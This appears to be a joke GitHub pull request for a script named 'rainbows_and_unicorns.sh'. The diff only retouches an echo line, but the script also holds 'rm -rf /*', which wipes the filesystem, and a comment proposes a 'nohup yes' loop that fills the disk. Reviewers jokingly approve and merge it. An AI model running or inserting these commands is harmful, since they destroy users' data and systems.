### PR TITLE
Simple addition to improve the quality of code

### PR DESCRIPTION
**Pull request by jgraves11**

### CODE REVIEW

File: rainbows_and_unicorns.sh [hunk 1]
```diff
@@ -1,2 +1,2 @@
-echo Goodbye cruel world
+echo "Goodbye, cruel world"
 rm -rf /*
```
Comment (ghost) [inline rainbows_and_unicorns.sh]: add 

nohup yes "goodbye" > .file

**Review by jrleeman — CHANGES_REQUESTED** [review]
I like the functionality, but will this be OS agnostic?

**Comment by ghost** [comment]
it would work on OSX and Linux.. what else?  OS2 Warp?  NextSTEP?

**Review by jrleeman — APPROVED** [review]
LGTM

**Pull request merged**